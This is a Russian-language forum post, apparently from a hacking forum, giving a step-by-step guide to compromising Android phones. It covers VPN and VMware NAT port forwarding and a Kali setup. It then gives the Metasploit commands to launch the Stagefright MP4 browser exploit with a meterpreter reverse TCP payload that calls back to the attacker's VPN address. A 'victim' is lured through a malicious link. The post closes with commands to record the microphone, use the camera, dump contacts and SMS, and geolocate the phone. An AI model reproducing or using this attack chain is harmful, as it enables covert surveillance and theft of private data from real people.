|
![]() |
![]() |
#1 |
Группа:
Member
|
![]() Начало
Ниже будет расписан гайд, как сделать это при помощи VPN и виртуалки VMware Workstation. 1.Открываем порт на ваше усмотрение, настраиваем VPN.Об этом не раз говорилось в роликах,и статьях на канале. ![]() 2.Если у вас уже есть тачка с кали, то приступаем к этому шагу.Если нет, то создаём её и настраиваем. Теперь пробросим открытые нами порты в виртуальной машине: переходим в Edit-Virtual Network Editor ![]() Нам нужно настроить NAT.Для этого нажимаем "Change Settings". ![]() После этого, нажимаем на кнопку NAT Settings. Перед началом, вам нужно узнать(или вы уже знаете) IP вашей тачки. Для этого запустите её и пропишите команду в терминале: ifconfig ![]() Теперь можем выключить машину.Возвращаемся в настройки, добавляем 2 правила, для TCP и UDP протокола соответственно. Вписываем открытый нами порт в "Host port" и "virtual machine port". ![]() после того,как добавили 2 правила для TCP и UDP, нажимаем OK. [Ссылки могут видеть только зарегистрированные пользователи. ] Теперь перейдём в Kali Kinux. проверим ip вашей тачки командой ifconfig в терминале: ![]() Откроем metasploit командой msfconsole: ![]() Ждём, пока прогрузится. Теперь прописываем в терминале следующее: use exploit/android/browser/stagefright_mp4_tx3g_64bit ![]() после этого, прописываем команду с вашим ip тачки: set SRVHOST 192.168.137.128 ![]() прописываем команду пэйлоада: set set PAYLOAD linux/armle/meterpreter/reverse_tcp ![]() прописываем IP от вашего VPN: set LHOST {ваш ip от VPN} ![]() прописываем открытый порт: set LPORT 2235 ![]() теперь прописываем команду: set VERBOSE true ![]() и наконец, запускаем эксплоит: exploit после этого, у нас запустится сервер: ![]() ВАЖНО! Теперь, берём IP адрес от VPN, добавляем к нему открытый порт и получаем "вредоносную" ссылку: [Ссылки могут видеть только зарегистрированные пользователи. ] - так будет выглядеть ваша ссылка. После того, как "жертва" перейдёт по ссылке, у вас откроется сессия. для просмотра всех открытых сессий, вводим команду: sessions -i для выбора конкретной сессии, прописываем: sessions -i {номер сессии} ![]() после успешного подключения, вводим help и смотрим доступные нам команды. возможно, сессия будет закрываться при попытке открыть её.Значит версия андроида не подходит под сие дело(надо версию ниже). С помощью следующих команд можно производить манипуляции с телефоном: Код:
record_mic - запись звука с микрофона webcam_snap - скриншот с камеры webcam_stream - просмотр видео с камеры dump_contacts - создаёт дамп контактов с телефона dump_sms - создаёт дамп смс с телефона geolocate - отображение геолокации Последний раз редактировалось paulmaksimovich; 28.12.2020 в 20:36.. |
![]() |
![]() |
![]() |
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
Опции темы | Поиск в этой теме |
Опции просмотра | |
|
|